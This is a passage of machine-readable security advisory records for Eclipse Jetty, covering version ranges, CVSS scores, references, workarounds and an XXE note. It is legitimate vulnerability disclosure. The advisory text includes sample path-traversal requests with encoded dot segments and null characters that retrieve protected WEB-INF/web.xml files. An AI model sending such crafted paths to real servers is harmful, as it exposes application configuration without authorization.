"https://lists.apache.org/thread.html/r874688141495df766e62be095f1dfb0bf4a24ca0340d8e0215c03fab@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r87b0c69fef09277333a7e1716926d1f237d462e143a335854ddd922f@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r87d8337300a635d66f0bb838bf635cdfcbba6b92c608a7813adbf4f4@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8866f0cd2a3b319288b7eea20ac137b9f260c813d10ee2db88b65d32@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3e05ab0922876e74fea975d70af82b98580f4c14ba643c4f8a9e3a94@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f32cb4965239399c22497a0aabb015b28b2372d4897185a6ef0ccd7@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r407c316f6113dfc76f7bb3cb1693f08274c521064a92e5214197548e@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4179c71908778cc0598ee8ee1eaed9b88fc5483c65373f45e087f650@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r44115ebfbf3b7d294d7a75f2d30bcc822dab186ebbcc2dce11915ca9@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4946ffd86ad6eb7cb7863311235c914cb41232380de8d9dcdb3c115c@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f29fb24639ebc5d15fc477656ebc2b3aa00fcfbe197000009c26b40@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r503045a75f4419d083cb63ac89e765d6fb8b10c7dacc0c54fce07cff@%3Creviews.iotdb.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r547bb14c88c5da2588d853ed3030be0109efa537dd797877dff14afd@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5494fdaf4a0a42a15c49841ba7ae577d466d09239ee1050458da0f29@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r556787f1ab14da034d79dfff0c123c05877bbe89ef163fd359b4564c@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r568d354961fa88f206dc345411fb11d245c6dc1a8da3e80187fc6706@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r58f5b14dc5ae43583db3a7e872419aca97ebe47bcd7f7334f4128016@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r59e0878013d329dcc481eeafebdb0ee445b1e2852d0c4827b1ddaff2@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5a07f274f355c914054c7357ad6d3456ffaca064f26cd780acb90a9a@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5a9462096c71593e771602beb0e69357adb5175d9a5c18d5181e0ab4@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6236ae4adc401e3b2f2575c22865f2f6c6ea9ff1d7b264b40d9602af@%3Cissues.beam.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66e99d973fd79ddbcb3fbdb24f4767fe9b911f5b0abb05d7b6f65801@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-378", "CWE-379", "CWE-552" ], "github_reviewed": true, "github_reviewed_at": "2020-11-04T17:48:31Z", "nvd_published_at": "2020-10-23T13:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v7ff-8wcx-gmc5", "published": "2021-04-06T17:31:01Z", "modified": "2024-03-15T05:19:57.447892Z", "aliases": [ "CVE-2021-28164" ], "related": [ "CVE-2021-28164" ], "summary": "Authorization Before Parsing and Canonicalization in jetty", "details": "Release 9.4.37 introduced a more precise implementation of [RFC3986](https://tools.ietf.org/html/rfc3986#section-3.3) with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations. The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the `WEB-INF` directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the `web.xml` file. This can reveal sensitive information regarding the implementation of a web application. Workarounds found by HttpCompliance mode RFC7230_NO_AMBIGUOUS_URIS can be enabled by updating `start.d/http.ini` to include: jetty.http.compliance=RFC7230_NO_AMBIGUOUS_URIS.", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.37" }, { "fixed": "9.4.39" } ] } ], "versions": [ "9.4.37.v20210219", "9.4.38.v20210224" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-v7ff-8wcx-gmc5/GHSA-v7ff-8wcx-gmc5.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28164" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210611-0006" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-551", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2021-04-02T20:28:10Z", "nvd_published_at": "2021-04-01T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vjv5-gp2w-65vm", "published": "2021-07-19T15:15:24Z", "modified": "2024-03-08T05:16:35.196736Z", "aliases": [ "CVE-2021-34429" ], "related": [ "CVE-2021-34429" ], "summary": "Encoded URIs can access WEB-INF directory in Eclipse Jetty", "details": "### Description\nURIs can be crafted using some encoded characters to access the content of the `WEB-INF` directory and/or bypass some security constraints.\nThis is a variation of the vulnerability reported in [CVE-2021-28164](https://nvd.nist.gov/vuln/detail/CVE-2021-28164)/[GHSA-v7ff-8wcx-gmc5](https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5).\n\n### Impact\nThe default compliance mode allows requests with URIs that contain a %u002e segment to access protected resources within the WEB-INF directory. For example, a request to `/%u002e/WEB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. Similarly, an encoded null character can prevent correct normalization so that /.%00/WEB-INF/web.xml cal also retrieve the web.xml file.\n\n### Workarounds\nSome Jetty [rewrite rules](https://www.eclipse.org/jetty/documentation/jetty-9/index.html#rewrite-handler) can be deployed to rewrite any request containing encoded dot segments or null characters in the raw request URI, to a known not found resource:\n```xml\n\u003cCall name=\"addRule\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.rewrite.handler.RewriteRegexRule\"\u003e\n \u003cSet name=\"regex\"\u003e.*/(?:\\.+/)+.*\u003c/Set\u003e\n \u003cSet name=\"replacement\"\u003e/WEB-INF/Not-Found\u003c/Set\u003e\n \u003c/New\u003e\n \u003c/Arg\u003e\n\u003c/Call\u003e\n\u003cCall name=\"addRule\"\u003e\n \u003cArg\u003e\n \u003cNew class=\"org.eclipse.jetty.rewrite.handler.ValidUrlRule\"/\u003e\n \u003c/Arg\u003e\n\u003c/Call\u003e\n```\n\n### Analysis\nPrior to 9.4.37, Jetty was protected from this style of attack by two lines of defense:\n + URIs were decoded first and then normalized for `.` and `..` sequences. Whilst this is not according to the RFC, it did remove relative segments that were encoded or parameterized and made the resulting URI paths safe from any repeated normalization (often done by URI manipulation and file system mapping).\n + The `FileResource` class treated any difference between absolute path and canonical path of a resource as an alias, and thus the resource would not be served by default.\n\nPrior to 9.4.37, the `FileResource` class was replaced by the `PathResource` class that did not treat normalization differences as aliases. Then release 9.4.37 updated the URI parsing to be compliant with the RFC, in that normalization is done before decoding. This allowed various encodings or adornments to relative path segments that would not be normalized by the pure RFC URI normalization, but were normalized by the file system, thus allowing protected resources to be accessed via an alias. Specifically by decoding URIs after normalization, it left them vulnerable to any subsequent normalization (potentially after checking security constraints) changing the URI singificantly. Such extra normalization is often down by URI manipulation code and file systems.\n\nWith Jetty releases 9.4.43, 10.0.6, 11.0.6, we have restored several lines of defense:\n + URIs are first decoded and then normalized which is not strictly according to the current RFC. Since the normalization is done after decoding, the URI paths produced are safe from further normalisation and the referenced resource cannot easily be so changed after passing security constraints.\n + During URI parsing checks are made for some specific segments/characters that are possible to be seen ambiguously by an application (e.g. encode dot segments, encoded separators, empty segments, parameterized dot segments and/or null characters). So even though Jetty code handles these URIs correctly, there is a risk that an application may not do so, thus such requests are rejected with a 400 Bad Request unless a specific compliance mode is set.\n + Once decoded and normalized by initial URI processing, Jetty will not decode or normalize a received URI again within its own resource handling. This avoids to possibility of double decode attacks.\n + The `ContextHandler.getResource(String path)` method always checks that the passed path is normalized, only accepting a non normal path if approved by an AliasChecker. This is the method that is directly used by Jetty resource serving.\n + The API methods like `ServletContext.getResource(String path)` will normalize the prior to calling `ContextHandler.getResource(String path)`. This allows applications to use non normal paths.\n + The `PathResource` class now considers any difference in normal/canonical name between a request resource name and the found resource name to be an alias, which will only be served if approved by an explicit `AliasChecker`\n\nIn summary, the defense is a front line of detection of specific known URI alias attacks, with the last line defense of not allowing any aliasing of resources.\n\nMany thanks to @cangqingzhe from @CloverSecLabs for reporting this issue. ", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.4.37" }, { "fixed": "9.4.43" } ] } ], "versions": [ "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/07/GHSA-vjv5-gp2w-65vm/GHSA-vjv5-gp2w-65vm.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.1" }, { "fixed": "10.0.6" } ] } ], "versions": [ "10.0.1", "10.0.2", "10.0.3", "10.0.4", "10.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/07/GHSA-vjv5-gp2w-65vm/GHSA-vjv5-gp2w-65vm.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-webapp", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-webapp" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.1" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/07/GHSA-vjv5-gp2w-65vm/GHSA-vjv5-gp2w-65vm.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34429" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r763840320a80e515331cbc1e613fa93f25faf62e991974171a325c82@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7dd079fa0ac6f47ba1ad0af98d7d0276547b8a4e005f034fb1016951@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r833a4c8bdbbfeb8a2cd38238e7b59f83edd5c1a0e508b587fc551a46@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8e6c116628c1277c3cf132012a66c46a0863fa2a3037c0707d4640d4@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90e7b4c42a96d74c219e448bee6a329ab0cd3205c44b63471d96c3ab@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d245c6c884bbc804a472116d730c1a01676bf24f93206a34923fc64@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e6158d72ef25077c2dc59fbddade2eacf7d259a2556c97a989f2fe8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb33d65c3e5686f2e3b9bb8a032a44163b2f2ad9d31a8727338f213c1@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc26807be68748b3347decdcd03ae183622244b0b4cb09223d4b7e500@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb157f55b9ae41b3076801de927c6fca1669c6d8eaf11a9df5dbeb46@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcea249eb7a0d243f21696e4985de33f3780399bf7b31ea1f6d489b8b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re01890eef49d4201018f2c97e26536e3e75f441ecdbcf91986c3bc17@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3de01414ccf682fe0951205f806dd8e94440798fd64c55a4941de3e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5e9bb535db779506013ef8799dc2a299e77cdad6668aa94c456dba6@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re850203ef8700cb826534dd4a1cb9f5b07bb8f6f973b39ff7838d3ba@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210819-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.43.v20210629" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r029c0c6833c8bb6acb094733fd7b75029d633f47a92f1c9d14391fc0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02f940c27e997a277ff14e79e84551382e1081e8978b417e0c2b0857@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0626f279ebf65506110a897e3a57ccd4072803ee5434b2503e070398@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a3ea27cca2ac7352d392b023b72e824387bc9ff16ba245ec663bdc6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2e32390cb7aedb39069e5b18aa130ca53e766258518faee63c31d3ea@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3aefe613abce594c71ace50088d2529bbde65d08b8e7ff2c2723aaa1@%3Cdev.santuario.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3c55b0baa4dc38958ae147b2f216e212605f1071297f845e14477d36@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r44ea39ca8110de7353bfec88f58aa3aa58a42bb324b8772512ee190c@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46900f74dbb7d168aeac43bf0e7f64825376bb7eb74d31a5b33344ce@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46f748c1dc9cf9b6c1c18f6b5bfc3a869907f68f72e17666f2f30f24@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4727d282b5c2d951057845a46065d59f6e33132edc0a14f41c26b01e@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48a93f2bc025acd7c7e341ed3864bfdeb75f0c768d41bc247e1a1f63@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5678d994d4dd8e7c838eed3bbc1a83a7f6bc62724b0cce67e8892a45@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r679d96f981d4c92724090ed2d5e8565a1d655a72bb315550489f052e@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e6f50c1ce1fb592cb43e913f5be23df104d50751465f8f1952ace0c@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r721ab6a5fa8d45bec76714b674f5d4caed2ebfeca69ad1d6d4caae6c@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74fdc446df551fe89a0a16957a1bfdaad19380e0c1afd30625685a9c@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r756443e9d50af7e8c3df82e2c45105f452c8e8195ddbc0c00f58d5fe@%3Ccommits.kafka.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-551", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2021-07-15T21:33:21Z", "nvd_published_at": "2021-07-15T17:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-58qw-p7qm-5rvh", "published": "2023-07-10T21:52:39Z", "modified": "2024-12-02T05:55:39.987028Z", "related": [ "CGA-36vh-w34f-wv6m", "CGA-cvc4-35r3-qcp6" ], "summary": "Eclipse Jetty XmlParser allows arbitrary DOCTYPE declarations", "details": "### From the reporter\n\n\u003e `XmlParser` is vulnerable to XML external entity (XXE) vulnerability.\n\u003e XmlParser is being used when parsing Jetty’s xml configuration files. An attacker might exploit\n\u003e this vulnerability in order to achieve SSRF or cause a denial of service.\n\u003e One possible scenario is importing a (remote) malicious WAR into a Jetty’s server, while the\n\u003e WAR includes a malicious web.xml.\n\n### Impact\nThere are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e. in order to exploit `XmlParser` the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against malicious web application and potentially hostile web applications should only be run on an isolated virtualisation. \n\nThus this is not considered a vulnerability of the Jetty server itself, as any such usage of the jetty XmlParser is equally vulnerable as a direct usage of the JVM supplied SAX parser. No CVE will be allocated to this advisory.\n\nHowever, any direct usage of the `XmlParser` class by an application may be vulnerable. The impact would greatly depend on how the application uses `XmlParser`, but it could be a denial of service due to large entity expansion, or possibly the revealing local files if the XML results are accessible remotely.\n\n### Patches\nAbility to configure the SAXParserFactory to fit the needs of your particular XML parser implementation have been merged as part of PR #10067\n\n### Workarounds\nDon't use `XmlParser` to parse data from users.\n\n\n", "affected": [ { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.0.0-alpha0" }, { "fixed": "10.0.16" } ] } ], "versions": [ "10.0.0", "10.0.0-alpha0", "10.0.0.alpha1", "10.0.0.alpha2", "10.0.0.beta0", "10.0.0.beta1", "10.0.0.beta2", "10.0.0.beta3", "10.0.1", "10.0.10", "10.0.11", "10.0.12", "10.0.13", "10.0.14", "10.0.15", "10.0.2", "10.0.3", "10.0.4", "10.0.5", "10.0.6", "10.0.7", "10.0.8", "10.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.0.15", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-alpha0" }, { "fixed": "11.0.16" } ] } ], "versions": [ "11.0.0", "11.0.0-alpha0", "11.0.0.beta1", "11.0.0.beta2", "11.0.0.beta3", "11.0.1", "11.0.10", "11.0.11", "11.0.12", "11.0.13", "11.0.14", "11.0.15", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.15", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "12.0.0.alpha0" }, { "fixed": "12.0.0" } ] } ], "versions": [ "12.0.0.alpha0", "12.0.0.alpha1", "12.0.0.alpha2", "12.0.0.alpha3", "12.0.0.beta0", "12.0.0.beta1", "12.0.0.beta2", "12.0.0.beta3", "12.0.0.beta4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 12.0.0.beta4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } }, { "package": { "name": "org.eclipse.jetty:jetty-xml", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jetty/jetty-xml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "9.4.52.v20230823" } ] } ], "versions": [ "7.0.0.M0", "7.0.0.M1", "7.0.0.M2", "7.0.0.M3", "7.0.0.M4", "7.0.0.RC0", "7.0.0.RC1", "7.0.0.RC2", "7.0.0.RC3", "7.0.0.RC4", "7.0.0.RC5", "7.0.0.RC6", "7.0.0.v20091005", "7.0.1.v20091125", "7.0.2.RC0", "7.0.2.v20100331", "7.1.0.RC0", "7.1.0.RC1", "7.1.0.v20100505", "7.1.1.v20100517", "7.1.2.v20100523", "7.1.3.v20100526", "7.1.4.v20100610", "7.1.5.v20100705", "7.1.6.v20100715", "7.2.0.RC0", "7.2.0.v20101020", "7.2.1.v20101111", "7.2.2.v20101205", "7.3.0.v20110203", "7.3.1.v20110307", "7.4.0.RC0", "7.4.0.v20110414", "7.4.1.v20110513", "7.4.2.v20110526", "7.4.3.v20110701", "7.4.4.v20110707", "7.4.5.v20110725", "7.5.0.RC0", "7.5.0.RC1", "7.5.0.RC2", "7.5.0.v20110901", "7.5.1.v20110908", "7.5.2.v20111006", "7.5.3.v20111011", "7.5.4.v20111024", "7.6.0.RC0", "7.6.0.RC1", "7.6.0.RC2", "7.6.0.RC3", "7.6.0.RC4", "7.6.0.RC5", "7.6.0.v20120127", "7.6.1.v20120215", "7.6.10.v20130312", "7.6.11.v20130520", "7.6.12.v20130726", "7.6.13.v20130916", "7.6.14.v20131031", "7.6.15.v20140411", "7.6.16.v20140903", "7.6.17.v20150415", "7.6.18.v20150929", "7.6.19.v20160209", "7.6.2.v20120308", "7.6.20.v20160902", "7.6.21.v20160908", "7.6.3.v20120416", "7.6.4.v20120524", "7.6.5.v20120716", "7.6.6.v20120903", "7.6.7.v20120910", "7.6.8.v20121106", "7.6.9.v20130131", "8.0.0.M0", "8.0.0.M1", "8.0.0.M2", "8.0.0.M3", "8.0.0.RC0", "8.0.0.v20110901", "8.0.1.v20110908", "8.0.2.v20111006", "8.0.3.v20111011", "8.0.4.v20111024", "8.1.0.RC0", "8.1.0.RC1", "8.1.0.RC2", "8.1.0.RC4", "8.1.0.RC5", "8.1.0.v20120127", "8.1.1.v20120215", "8.1.10.v20130312", "8.1.11.v20130520", "8.1.12.v20130726", "8.1.13.v20130916", "8.1.14.v20131031", "8.1.15.v20140411", "8.1.16.v20140903", "8.1.17.v20150415", "8.1.18.v20150929", "8.1.19.v20160209", "8.1.2.v20120308", "8.1.20.v20160902", "8.1.21.v20160908", "8.1.22.v20160922", "8.1.3.v20120416", "8.1.4.v20120524", "8.1.5.v20120716", "8.1.6.v20120903", "8.1.7.v20120910", "8.1.8.v20121106", "8.1.9.v20130131", "8.2.0.v20160908", "9.0.0.M0", "9.0.0.M1", "9.0.0.M2", "9.0.0.M3", "9.0.0.M4", "9.0.0.M5", "9.0.0.RC0", "9.0.0.RC1", "9.0.0.RC2", "9.0.0.v20130308", "9.0.1.v20130408", "9.0.2.v20130417", "9.0.3.v20130506", "9.0.4.v20130625", "9.0.5.v20130815", 